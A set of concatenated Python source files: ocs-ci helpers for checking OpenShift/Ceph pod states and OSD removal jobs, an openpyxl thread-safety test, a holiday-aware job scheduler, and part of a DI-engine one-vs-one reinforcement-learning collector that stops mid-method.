    Args:
        number_of_osd_pods_before (int): Number of osd pods that existed
            before the new ones were expected to appear
    """
    # Statuses that show an osd pod has started coming up
    status_options = ["Init:1/4", "Init:2/4", "Init:3/4", "PodInitializing", "Running"]
    try:
        for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods):
            # Check if the new osd pods has started to come up
            new_osd_pods = osd_pods[number_of_osd_pods_before:]
            new_osd_pods_come_up = [
                pod.status() in status_options for pod in new_osd_pods
            ]
            if any(new_osd_pods_come_up):
                logging.info("One or more of the new osd pods has started to come up")
                break
    except TimeoutExpiredError:
        logging.warning("None of the new osd pods reached the desired status")
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Gets the dictionary of pod and its restart count for all the pods in a given namespace

    Returns:
        dict: dictionary of pod name and its corresponding restart count
    """
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    restart_dict = {}
    for p in get_all_pods(namespace):
        # osd-prepare and canary pods get created freshly whenever an osd is
        # added, so their restart counts are not comparable
        if "rook-ceph-osd-prepare" in p.name or "rook-ceph-drain-canary" in p.name:
            continue
        restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS"))
    logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
    return restart_dict
def check_pods_in_running_state(
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    pod_names=None,
    raise_pod_not_found_error=False,
):
    """
    checks whether all the pods in a given namespace are in Running state or not

    Args:
        namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
        pod_names (list): List of the pod names to check.
            If not provided, it will check all the pods in the given namespace
        raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
            in the pod names are not found. If False, it ignores the case of pod not found and
            returns the pod objects of the rest of the pod names. The default value is False

    Returns:
        Boolean: True, if all pods in Running state. False, otherwise
    """
    ret_val = True
    if pod_names:
        list_of_pods = get_pod_objs(pod_names, raise_pod_not_found_error)
    else:
        list_of_pods = get_all_pods(namespace)
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    for p in list_of_pods:
        # Skip osd-prepare and canary pods as they get created freshly when an
        # osd needs to be added, and transient debug pods; the original also
        # skipped status-checking these, but fetched each pod's status twice.
        if (
            "rook-ceph-osd-prepare" in p.name
            or "rook-ceph-drain-canary" in p.name
            or "debug" in p.name
        ):
            continue
        # Fetch the status exactly once per pod
        status = ocp_pod_obj.get_resource(p.name, "STATUS")
        # Exact comparison; the original's `status not in "Running"` was a
        # substring test that would also accept e.g. "Run"
        if status != "Running":
            logging.error(
                f"The pod {p.name} is in {status} state. Expected = Running"
            )
            ret_val = False
    return ret_val
def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Checks the running state pods in a given namespace.

    Returns:
        List: all the pod objects that are in running state only
    """
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    return [
        pod
        for pod in get_all_pods(namespace)
        if "Running" in ocp_pod_obj.get_resource(pod.name, "STATUS")
    ]
def wait_for_pods_to_be_running(
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    pod_names=None,
    raise_pod_not_found_error=False,
    timeout=200,
    sleep=10,
):
    """
    Wait for all the pods in a specific namespace to be running.

    Args:
        namespace (str): the namespace ot the pods
        pod_names (list): List of the pod names to check.
            If not provided, it will check all the pods in the given namespace
        raise_pod_not_found_error (bool): If True, it raises an exception(in the function
            'check_pods_in_running_state'), if one of the pods in the pod names are not found.
            If False, it ignores the case of pod not found and returns the pod objects of
            the rest of the pod names. The default value is False
        timeout (int): time to wait for pods to be running
        sleep (int): Time in seconds to sleep between attempts

    Returns:
        bool: True, if all pods in Running state. False, otherwise
    """
    sampler = TimeoutSampler(
        timeout=timeout,
        sleep=sleep,
        func=check_pods_in_running_state,
        namespace=namespace,
        pod_names=pod_names,
        raise_pod_not_found_error=raise_pod_not_found_error,
    )
    try:
        for all_running in sampler:
            # Stop as soon as one sample reports every pod Running
            if all_running:
                logging.info("All the pods reached status running!")
                return True
    except TimeoutExpiredError:
        logging.warning(
            f"Not all the pods reached status running " f"after {timeout} seconds"
        )
        return False
def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    The function returns the list of nodes for the given selector

    Args:
        selector (str): The resource selector to search with

    Returns:
        list: a list of nodes that runs the given selector pods
    """
    matching_pods = get_all_pods(namespace=namespace, selector=[selector])
    pods_running_nodes = [get_pod_node(matching_pod) for matching_pod in matching_pods]
    logger.info(f"{selector} running on nodes {pods_running_nodes}")
    # Deduplicate: several pods may land on the same node
    return list(set(pods_running_nodes))
def get_osd_removal_pod_name(osd_id, timeout=60):
    """
    Get the osd removal pod name

    Args:
        osd_id (int): The osd's id to get the osd removal pod name
        timeout (int): The time to wait for getting the osd removal pod name

    Returns:
        str: The osd removal pod name, or None if not found within the timeout
    """
    ocs_version = Version.coerce(config.ENV_DATA["ocs_version"])
    # The removal job's naming scheme changed between OCS releases
    if ocs_version == Version.coerce("4.7"):
        pattern = "ocs-osd-removal-job"
    elif ocs_version == Version.coerce("4.8"):
        pattern = "ocs-osd-removal-"
    else:
        pattern = f"ocs-osd-removal-{osd_id}"
    sampler = TimeoutSampler(
        timeout=timeout,
        sleep=5,
        func=get_pod_name_by_pattern,
        pattern=pattern,
    )
    try:
        for matching_names in sampler:
            if matching_names:
                logging.info(f"Found pod {matching_names[0]}")
                return matching_names[0]
    except TimeoutExpiredError:
        logger.warning(f"Failed to get pod by the pattern {pattern}")
        return None
def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY):
    """
    Function to check toleration on pods and log, per pod, whether the
    given toleration key is present.

    Args:
        toleration_key (str): The toleration key to check
    """
    pod_objs = get_all_pods(
        namespace=defaults.ROOK_CLUSTER_NAMESPACE,
        selector=[constants.TOOL_APP_LABEL],
        exclude_selector=True,
    )
    for pod_obj in pod_objs:
        resource_name = pod_obj.name
        tolerations = pod_obj.get().get("spec").get("tolerations")
        # Evaluate per pod. The original kept one flag across the whole loop,
        # so once any pod matched, every later pod was reported as tolerating.
        found = any(entry["key"] == toleration_key for entry in tolerations)
        if found:
            logger.info(f"The Toleration {toleration_key} exists on {resource_name}")
        else:
            logger.error(
                f"The pod {resource_name} does not have toleration {toleration_key}"
            )
def run_osd_removal_job(osd_ids=None):
    """
    Run the ocs-osd-removal job

    Args:
        osd_ids (list): The osd IDs.

    Returns:
        ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object
    """
    # NOTE(review): the default osd_ids=None makes the join below raise
    # TypeError; callers are expected to always pass a non-empty list.
    osd_ids_str = ",".join(map(str, osd_ids))
    ocp_version = get_ocp_version()
    # OCP >= 4.6 templates take the plural FAILED_OSD_IDS parameter
    if Version.coerce(ocp_version) >= Version.coerce("4.6"):
        cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_ids_str} -o yaml"
    else:
        cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_ids_str} -o yaml"
    logger.info(f"Executing OSD removal job on OSD ids: {osd_ids_str}")
    ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd)
    # Add the namespace param, so that the ocs-osd-removal job will be created in the correct namespace
    osd_removal_job_yaml["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
    osd_removal_job = OCS(**osd_removal_job_yaml)
    osd_removal_job.create(do_reload=False)
    return osd_removal_job
def verify_osd_removal_job_completed_successfully(osd_id):
    """
    Verify that the ocs-osd-removal job completed successfully

    Args:
        osd_id (str): The osd id

    Returns:
        bool: True, if the ocs-osd-removal job completed successfully. False, otherwise
    """
    logger.info("Getting the ocs-osd-removal pod name")
    osd_removal_pod_name = get_osd_removal_pod_name(osd_id)
    osd_removal_pod_obj = get_pod_obj(
        osd_removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    timeout = 300
    try:
        is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
            condition=constants.STATUS_COMPLETED,
            resource_name=osd_removal_pod_name,
            sleep=20,
            timeout=timeout,
        )
    # Don't failed the test yet if the ocs-osd-removal pod job is not completed
    except TimeoutExpiredError:
        is_completed = False
    ocp_pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    osd_removal_pod_status = ocp_pod_obj.get_resource_status(osd_removal_pod_name)
    # Check if 'osd_removal_pod' is in status 'completed'
    if not is_completed and osd_removal_pod_status != constants.STATUS_COMPLETED:
        if osd_removal_pod_status != constants.STATUS_RUNNING:
            # Neither Completed nor still Running: give up
            logger.info(
                f"ocs-osd-removal pod job did not reach status '{constants.STATUS_COMPLETED}' "
                f"or '{constants.STATUS_RUNNING}' after {timeout} seconds"
            )
            return False
        else:
            # Still Running: retry with a much longer timeout
            logger.info(
                f"ocs-osd-removal pod job reached status '{constants.STATUS_RUNNING}',"
                f" but we were waiting for status '{constants.STATUS_COMPLETED}' "
            )
            new_timeout = 900
            logger.info(
                f"Wait more {new_timeout} seconds for ocs-osd-removal pod job to be completed"
            )
            is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
                condition=constants.STATUS_COMPLETED,
                resource_name=osd_removal_pod_name,
                sleep=30,
                timeout=new_timeout,
            )
            if not is_completed:
                logger.info(
                    f"ocs-osd-removal pod job did not complete after {new_timeout} seconds"
                )
                return False
    # Verify OSD removal from the ocs-osd-removal pod logs
    logger.info(f"Verifying removal of OSD from {osd_removal_pod_name} pod logs")
    logs = get_pod_logs(osd_removal_pod_name)
    pattern = f"purged osd.{osd_id}"
    if not re.search(pattern, logs):
        logger.warning(
            f"Didn't find the removal of OSD from {osd_removal_pod_name} pod logs"
        )
        return False
    return True
def delete_osd_removal_job(osd_id):
    """
    Delete the ocs-osd-removal job.

    Args:
        osd_id (str): The osd id

    Returns:
        bool: True, if the ocs-osd-removal job deleted successfully. False, otherwise
    """
    ocs_version = config.ENV_DATA["ocs_version"]
    # From OCS 4.7 the job uses a fixed name; older releases embed the osd id
    if Version.coerce(ocs_version) >= Version.coerce("4.7"):
        job_name = "ocs-osd-removal-job"
    else:
        job_name = f"ocs-osd-removal-{osd_id}"
    osd_removal_job = get_job_obj(job_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    osd_removal_job.delete()
    try:
        osd_removal_job.ocp.wait_for_delete(resource_name=job_name)
    # Also catch the project's TimeoutExpiredError: the original caught only
    # the builtin TimeoutError, which let a wait_for_delete timeout propagate
    # instead of returning False as documented.
    except (TimeoutError, TimeoutExpiredError):
        logger.warning(f"{job_name} job did not get deleted successfully")
        return False
    return True
def get_deployment_name(pod_name):
    """
    Get the deployment of the pod.

    Args:
        pod_name (str): The pod's name.

    Returns:
        The deployment of the specific pod name
    """
    # A pod name is "<deployment>-<replicaset-hash>-<pod-hash>"; drop the last
    # two dash-separated tokens to recover the deployment name
    name_tokens = pod_name.split("-")
    return "-".join(name_tokens[:-2])
def get_osd_pod_id(osd_pod):
    """
    Get the osd pod id

    Args:
        osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object

    Returns:
        str: The osd pod id
    """
    # The osd id is carried on the pod's 'ceph-osd-id' label
    metadata = osd_pod.get().get("metadata")
    return metadata.get("labels").get("ceph-osd-id")
def get_pods_in_statuses(status_options, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Get all the pods in specific statuses

    Args:
        status_options (list): The list of the status options.
        namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list: All the pods that their status in the 'status_options' list.
    """
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    return [
        p
        for p in get_all_pods(namespace)
        if ocp_pod_obj.get_resource_status(p.name) in status_options
    ]
def get_pod_ceph_daemon_type(pod_obj):
    """
    Get the ceph daemon type of the pod object

    Args:
        pod_obj (Pod): the pod object

    Returns:
        str: The pod's ceph daemon type
    """
    # The daemon type (e.g. mon/osd/mgr) is carried on the pod's labels
    pod_labels = pod_obj.get_labels()
    return pod_labels.get("ceph_daemon_type")
def check_pods_after_node_replacement():
    """
    Check the pods status after the node replacement process.

    Returns:
        bool: True if all the pods are running after a specific time. False otherwise.

    """
    # Fast path: everything came back within 3 minutes
    if wait_for_pods_to_be_running(timeout=180):
        return True

    not_ready_statuses = [
        constants.STATUS_ERROR,
        constants.STATUS_PENDING,
        constants.STATUS_CLBO,
        constants.STATUS_TERMINATING,
    ]
    pods_not_ready = get_pods_in_statuses(status_options=not_ready_statuses)

    if not pods_not_ready:
        logger.info("All the pods are running")
        return True

    if len(pods_not_ready) > 1:
        logger.warning("More than one pod is not running")
        return False

    # Exactly one pod is not ready - only a mon pod gets extra grace time
    pod_daemon_type = get_pod_ceph_daemon_type(pods_not_ready[0])
    if pod_daemon_type != constants.MON_DAEMON:
        logger.warning(f"One of the '{pod_daemon_type}' pods is not running")
        return False

    logger.info(
        f"One of the '{pod_daemon_type}' pods is not running, "
        f"but all the other pods are running"
    )
    timeout = 1500
    logger.info(
        f"waiting another {timeout} seconds for all the pods to be running..."
    )
    if wait_for_pods_to_be_running(timeout=timeout, sleep=30):
        logger.info("All the pods are running")
        return True
    logger.warning(
        f"Not all the pods are in a running state after {timeout} seconds"
    )
    return False
def get_osd_pods_having_ids(osd_ids):
    """
    Get the osd pods having specific ids

    Args:
        osd_ids (list): The list of the osd ids

    Returns:
        list: The osd pods having the osd ids

    """
    # Set membership keeps the per-pod lookup O(1)
    osd_ids_set = set(osd_ids)
    return [pod for pod in get_osd_pods() if get_osd_pod_id(pod) in osd_ids_set]
def get_pod_objs(
    pod_names,
    raise_pod_not_found_error=False,
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
    """
    Get the pod objects of the specified pod names

    Args:
        pod_names (list): The list of the pod names to get their pod objects
        namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
        raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
            in the pod names are not found. If False, it ignores the case of pod not found and
            returns the pod objects of the rest of the pod names. The default value is False

    Returns:
        list: The pod objects of the specified pod names

    Raises:
        ResourceNotFoundError: If 'raise_pod_not_found_error' is True,
            and not all the pod names were found

    """
    # Set membership keeps the per-pod lookup O(1)
    pod_names_set = set(pod_names)
    all_pods = get_all_pods(namespace=namespace)
    matching_pods = [pod for pod in all_pods if pod.name in pod_names_set]

    if len(pod_names) > len(matching_pods):
        missing_names = list(pod_names_set - {pod.name for pod in matching_pods})
        error_message = f"Did not find the following pod names: {missing_names}"
        if raise_pod_not_found_error:
            raise ResourceNotFoundError(error_message)
        logger.info(error_message)

    return matching_pods
def wait_for_change_in_pods_statuses(
    pod_names,
    current_statuses=None,
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    timeout=300,
    sleep=20,
):
    """
    Wait for the pod statuses in a specific namespace to change.

    Args:
        pod_names (list): List of the pod names to check if their status changed.
        namespace (str): the namespace of the pods
        current_statuses (list): The current pod statuses. These are the pod statuses
            to check if they changed during each iteration.
        timeout (int): time to wait for pod statuses to change
        sleep (int): Time in seconds to sleep between attempts

    Returns:
        bool: True, if the pod statuses have changed. False, otherwise

    """
    if current_statuses is None:
        # If 'current_statuses' is None the default value will be the ready statues
        current_statuses = [constants.STATUS_RUNNING, constants.STATUS_COMPLETED]

    # Create the OCP helper once - it does not change between sampler iterations
    # (the original rebuilt it on every attempt).
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    try:
        for pod_objs in TimeoutSampler(
            timeout=timeout,
            sleep=sleep,
            func=get_pod_objs,
            namespace=namespace,
            pod_names=pod_names,
        ):
            # A pod that disappeared counts as a status change
            if len(pod_objs) < len(pod_names):
                pod_names_found_set = {p.name for p in pod_objs}
                pod_names_not_found = list(set(pod_names) - pod_names_found_set)
                logger.info(f"Some of the pods have not found: {pod_names_not_found}")
                return True
            for p in pod_objs:
                try:
                    pod_status = ocp_pod_obj.get_resource_status(p.name)
                except CommandFailed as ex:
                    # Best effort: a transient query failure is not a status change
                    logger.info(
                        f"Can't get the status of the pod {p.name} due to the error: {ex}"
                    )
                    continue
                if pod_status not in current_statuses:
                    logger.info(
                        f"The status of the pod '{p.name}' has changed to '{pod_status}'"
                    )
                    return True
    except TimeoutExpiredError:
        # Fix: use the module-level 'logger' like the rest of this module
        # (the original called the root 'logging' module directly).
        logger.info(f"The status of the pods did not change after {timeout} seconds")
        return False
def get_rook_ceph_pod_names():
    """
    Get all the rook ceph pod names

    Returns:
        list: List of the rook ceph pod names

    """
    all_names = get_pod_name_by_pattern("rook-ceph-")
    # The rook-ceph-tools pod is created by OCS rather than the rook ceph
    # operator, so it is filtered out.
    return [name for name in all_names if not name.startswith("rook-ceph-tools-")]
def get_mon_pod_id(mon_pod):
    """
    Get the mon pod id

    Args:
        mon_pod (ocs_ci.ocs.resources.pod.Pod): The mon pod object

    Returns:
        str: The mon pod id

    """
    metadata = mon_pod.get().get("metadata")
    return metadata.get("labels").get("ceph_daemon_id")
def delete_all_osd_removal_jobs(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Delete all the osd removal jobs in a specific namespace

    Args:
        namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        bool: True, if all the jobs deleted successfully. False, otherwise

    """
    all_deleted = True
    for job in get_jobs_with_prefix("ocs-osd-removal-", namespace=namespace):
        job.delete()
        try:
            job.ocp.wait_for_delete(resource_name=job.name)
        except TimeoutError:
            logger.warning(
                f"{job.name} job did not get deleted successfully"
            )
            all_deleted = False
    return all_deleted
|
long_dump_thread.py | # Copyright (c) 2010-2011 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
import threading
from openpyxl.workbook import Workbook
from openpyxl.shared.compat import StringIO
def test_thread_safe_dump():
    """Dump many optimized-write workbooks concurrently to exercise thread safety."""

    def dump_workbook():
        # Each thread builds and serializes its own workbook into memory
        wb = Workbook(optimized_write=True)
        ws = wb.create_sheet()
        ws.append(range(30))
        wb.save(filename=StringIO())

    # Fix: keep references to the threads and join them all, so the test
    # actually waits for every dump to finish instead of letting workers
    # fail silently during interpreter shutdown.
    threads = []
    for thread_idx in range(400):
        thread = threading.Thread(target=dump_workbook)
        thread.start()
        print("starting thread %d" % thread_idx)
        threads.append(thread)
    for thread in threads:
        thread.join()
|
scheduling.py | import schedule
import threading
import time
import datetime
class JobSchedule(object):
    """A callable job bundled with its scheduling settings.

    The SECOND..WEEK constants select the repetition unit; the holiday
    constants are Italian fixed-date holidays encoded as "MMDD" strings.
    """

    # Repetition units
    SECOND = 0
    MINUTE = 1
    HOUR = 2
    DAY = 3
    WEEK = 4

    # Italian static (fixed-date) holidays, encoded as "MMDD"
    NEW_YEAR = "0101"
    EPIPHANY = "0106"
    LIBERATION = "0425"
    LABOUR_DAY = "0501"
    # Fix: Republic Day is June 2nd, i.e. "0602" in the "MMDD" encoding used
    # by every other constant here ("0206" had day and month swapped; the
    # holiday checker tests month == 6 and day == 2).
    REPUBLIC_DAY = "0602"
    ASSUMPTION_DAY = "0815"
    ALL_SAINTS = "1101"
    IMMACULATE_DAY = "1208"
    CHRISTMAS = "1225"
    STEPHEN = "1226"

    def __init__(self, job, time_schedule, repetition, static_holiday, *args):
        """
        Args:
            job: the callable to execute.
            time_schedule: interval amount for the chosen repetition unit.
            repetition: one of SECOND/MINUTE/HOUR/DAY/WEEK.
            static_holiday: one of the "MMDD" holiday constants (or None).
            *args: positional arguments forwarded to the job.
        """
        self.job = job
        self.args = args
        self.time_schedule = time_schedule
        self.repetition = repetition
        self.static_holiday = static_holiday
class SchedulingError(Exception):
    """Raised when a job cannot be scheduled (invalid repetition or job type)."""

    def __init__(self, message):
        # Delegate message storage to the base Exception class.
        super().__init__(message)
class ScheduleManager(object):
    """Registers recurring jobs with a shared scheduler and fires one-shot
    jobs when today is one of the configured static holidays."""

    # Class-level scheduler shared by all manager instances
    manager = schedule.Scheduler()

    def __init__(self, jobs: list, jobs_static_holidays: list):
        """
        Constructor with a jobs list to schedule
        :param jobs: a list of JobSchedule
        :param jobs_static_holidays: a list of JobSchedule to run on static holidays
        """
        self.jobs = jobs
        self.static_jobs = jobs_static_holidays
        # Register both job families concurrently
        t = threading.Thread(target=self.__init_jobs)
        t1 = threading.Thread(target=self.__init_static_holidays_jobs)
        t.start()
        t1.start()

    def __init_jobs(self):
        # Register every recurring job with the shared scheduler
        for job in self.jobs:
            if not isinstance(job, JobSchedule):
                raise SchedulingError("Error: job in job list is not an instance of JobSchedule")
            if job.repetition == JobSchedule.SECOND:
                self.manager.every(job.time_schedule).seconds.do(job.job, *job.args)
            elif job.repetition == JobSchedule.MINUTE:
                self.manager.every(job.time_schedule).minutes.do(job.job, *job.args)
            elif job.repetition == JobSchedule.HOUR:
                self.manager.every(job.time_schedule).hours.do(job.job, *job.args)
            elif job.repetition == JobSchedule.DAY:
                self.manager.every(job.time_schedule).days.do(job.job, *job.args)
            elif job.repetition == JobSchedule.WEEK:
                # Fix: honour the requested interval instead of a hard-coded
                # "every 7 days", which ignored job.time_schedule entirely.
                self.manager.every(job.time_schedule).weeks.do(job.job, *job.args)
            else:
                raise SchedulingError("Job repetition not valid.")

    def __init_static_holidays_jobs(self):
        for sj in self.static_jobs:
            if isinstance(sj, JobSchedule):
                self.check_static_holidays(job=sj)
            else:
                raise SchedulingError("Error: job in job list is not an instance of JobSchedule")

    def check_static_holidays(self, job: JobSchedule):
        """Start the job on a thread if today matches its static holiday."""
        now = datetime.datetime.now().date()
        # (month, day) of each supported fixed-date holiday
        holiday_dates = {
            JobSchedule.NEW_YEAR: (1, 1),
            JobSchedule.EPIPHANY: (1, 6),
            JobSchedule.LIBERATION: (4, 25),
            JobSchedule.LABOUR_DAY: (5, 1),
            JobSchedule.REPUBLIC_DAY: (6, 2),
            JobSchedule.ASSUMPTION_DAY: (8, 15),
            JobSchedule.ALL_SAINTS: (11, 1),
            JobSchedule.IMMACULATE_DAY: (12, 8),
            JobSchedule.CHRISTMAS: (12, 25),
            JobSchedule.STEPHEN: (12, 26),
        }
        expected = holiday_dates.get(job.static_holiday)
        if expected is not None and (now.month, now.day) == expected:
            self.__start_check_on_thread(job)

    def __start_check_on_thread(self, job: JobSchedule):
        # Fire-and-forget: the holiday job runs on its own thread
        t = threading.Thread(target=job.job, args=job.args)
        t.start()

    def run_checks(self):
        """Run pending scheduled jobs forever, polling once a second."""
        while True:
            self.manager.run_pending()
            time.sleep(1)
one_vs_one_collector.py | from typing import Dict, Any, List
import copy
import time
import uuid
from collections import namedtuple
from threading import Thread
from functools import partial
import numpy as np
import torch
from easydict import EasyDict
from ding.policy import create_policy, Policy
from ding.envs import get_vec_env_setting, create_env_manager
from ding.utils import get_data_compressor, pretty_print, PARALLEL_COLLECTOR_REGISTRY
from ding.envs import BaseEnvTimestep, BaseEnvManager
from .base_parallel_collector import BaseCollector
from .base_serial_collector import CachePool, TrajBuffer
INF = float("inf")
@PARALLEL_COLLECTOR_REGISTRY.register('one_vs_one')
class OneVsOneCollector(BaseCollector):
    """
    Feature:
      - one policy or two policies, many envs
      - async envs(step + reset)
      - batch network eval
      - different episode length env
      - periodic policy update
      - metadata + stepdata
    """
    config = dict(
        print_freq=5,
        compressor='lz4',
        update_policy_second=3,
        # The following keys is set by the commander
        # env
        # policy
        # collect_setting
        # eval_flag
        # policy_update_path
    )

    # override
    def __init__(self, cfg: dict) -> None:
        super().__init__(cfg)
        # Background thread that periodically pulls new policy weights (collect mode only)
        self._update_policy_thread = Thread(
            target=self._update_policy_periodically, args=(), name='update_policy', daemon=True
        )
        self._start_time = time.time()
        self._compressor = get_data_compressor(self._cfg.compressor)
        # create env
        self._env_cfg = self._cfg.env
        env_manager = self._setup_env_manager(self._env_cfg)
        self.env_manager = env_manager
        # create policy
        if self._eval_flag:
            assert len(self._cfg.policy) == 1
            policy = [create_policy(self._cfg.policy[0], enable_field=['eval']).eval_mode]
            self.policy = policy
            self._policy_is_active = [None]
            self._policy_iter = [None]
            self._traj_buffer_length = self._traj_len if self._traj_len != INF else None
            # NOTE(review): this passes self._traj_len (possibly INF) while the collect
            # branch passes self._traj_buffer_length - confirm whether eval should also
            # use the capped length.
            self._traj_buffer = {env_id: [TrajBuffer(self._traj_len)] for env_id in range(self._env_num)}
        else:
            assert len(self._cfg.policy) == 2
            policy = [create_policy(self._cfg.policy[i], enable_field=['collect']).collect_mode for i in range(2)]
            self.policy = policy
            self._policy_is_active = [None for _ in range(2)]
            self._policy_iter = [None for _ in range(2)]
            self._traj_buffer_length = self._traj_len if self._traj_len != INF else None
            self._traj_buffer = {
                env_id: [TrajBuffer(self._traj_buffer_length) for _ in range(len(policy))]
                for env_id in range(self._env_num)
            }
        # self._first_update_policy = True
        self._episode_result = [[] for _ in range(self._env_num)]
        self._obs_pool = CachePool('obs', self._env_num)
        self._policy_output_pool = CachePool('policy_output', self._env_num)
        self._total_step = 0
        self._total_sample = 0
        self._total_episode = 0

    @property
    def policy(self) -> List[Policy]:
        return self._policy

    # override
    @policy.setter
    def policy(self, _policy: List[Policy]) -> None:
        self._policy = _policy
        self._n_episode = _policy[0].get_attribute('cfg').collect.get('n_episode', None)
        self._n_sample = _policy[0].get_attribute('cfg').collect.get('n_sample', None)
        assert any(
            [t is None for t in [self._n_sample, self._n_episode]]
        ), "n_episode/n_sample in policy cfg can't be not None at the same time"
        # TODO(nyz) the same definition of traj_len in serial and parallel
        if self._n_episode is not None:
            self._traj_len = INF
        elif self._n_sample is not None:
            self._traj_len = self._n_sample

    @property
    def env_manager(self) -> BaseEnvManager:
        # Fix: the original getter declared an extra '_env_manager' parameter and
        # assigned to it, so any read of 'self.env_manager' raised TypeError.
        # A property getter takes only 'self' and returns the stored manager.
        return self._env_manager

    # override
    @env_manager.setter
    def env_manager(self, _env_manager: BaseEnvManager) -> None:
        self._env_manager = _env_manager
        self._env_manager.launch()
        self._env_num = self._env_manager.env_num
        self._predefined_episode_count = self._env_num * self._env_manager._episode_num

    def _setup_env_manager(self, cfg: EasyDict) -> BaseEnvManager:
        """Build the env manager from the evaluator or collector env config."""
        env_fn, collector_env_cfg, evaluator_env_cfg = get_vec_env_setting(cfg)
        if self._eval_flag:
            env_cfg = evaluator_env_cfg
        else:
            env_cfg = collector_env_cfg
        env_manager = create_env_manager(cfg.manager, [partial(env_fn, cfg=c) for c in env_cfg])
        return env_manager

    def _start_thread(self) -> None:
        # evaluator doesn't need to update policy periodically, only updating policy when starts
        if not self._eval_flag:
            self._update_policy_thread.start()

    def _join_thread(self) -> None:
        if not self._eval_flag:
            self._update_policy_thread.join()
            del self._update_policy_thread

    # override
    def close(self) -> None:
        if self._end_flag:
            return
        self._end_flag = True
        time.sleep(1)
        if hasattr(self, '_env_manager'):
            self._env_manager.close()
        self._join_thread()

    # override
    def _policy_inference(self, obs: Dict[int, Any]) -> Dict[int, Any]:
        """Run each policy over the batched observations and return env_id -> action."""
        env_ids = list(obs.keys())
        if len(self._policy) > 1:
            assert not self._eval_flag
            # Split the joint observation so each policy sees its own player's view
            obs = [{id: obs[id][i] for id in env_ids} for i in range(len(self._policy))]
        else:
            assert self._eval_flag
            obs = [obs]
        self._obs_pool.update(obs)
        policy_outputs = []
        for i in range(len(self._policy)):
            if self._eval_flag:
                policy_output = self._policy[i].forward(obs[i])
            else:
                policy_output = self._policy[i].forward(obs[i], **self._cfg.collect_setting)
            policy_outputs.append(policy_output)
        self._policy_output_pool.update(policy_outputs)
        actions = {}
        for env_id in env_ids:
            action = [policy_outputs[i][env_id]['action'] for i in range(len(self._policy))]
            action = torch.stack(action).squeeze()
            actions[env_id] = action
        return actions

    # override
    def _env_step(self, actions: Dict[int, Any]) -> Dict[int, Any]:
        return self._env_manager.step(actions)

    # override
    def _process_timestep(self, timestep: Dict[int, namedtuple]) -> None:
        """Store transitions, emit finished trajectories, and handle episode ends."""
        for env_id, t in timestep.items():
            if t.info.get('abnormal', False):
                # If there is an abnormal timestep, reset all the related variables, also this env has been reset
                for c in self._traj_buffer[env_id]:
                    c.clear()
                self._obs_pool.reset(env_id)
                self._policy_output_pool.reset(env_id)
                for p in self._policy:
                    p.reset([env_id])
                continue
            self._total_step += 1
            # Split the joint timestep into one per player/policy
            t = [BaseEnvTimestep(t.obs[i], t.reward[i], t.done, t.info) for i in range(len(self._policy))]
            if t[0].done:
                self._total_episode += 1
            if not self._eval_flag:
                for i in range(len(self._policy)):
                    if self._policy_is_active[i]:
                        # Only active policy will store transition into replay buffer.
                        transition = self._policy[i].process_transition(
                            self._obs_pool[env_id][i], self._policy_output_pool[env_id][i], t[i]
                        )
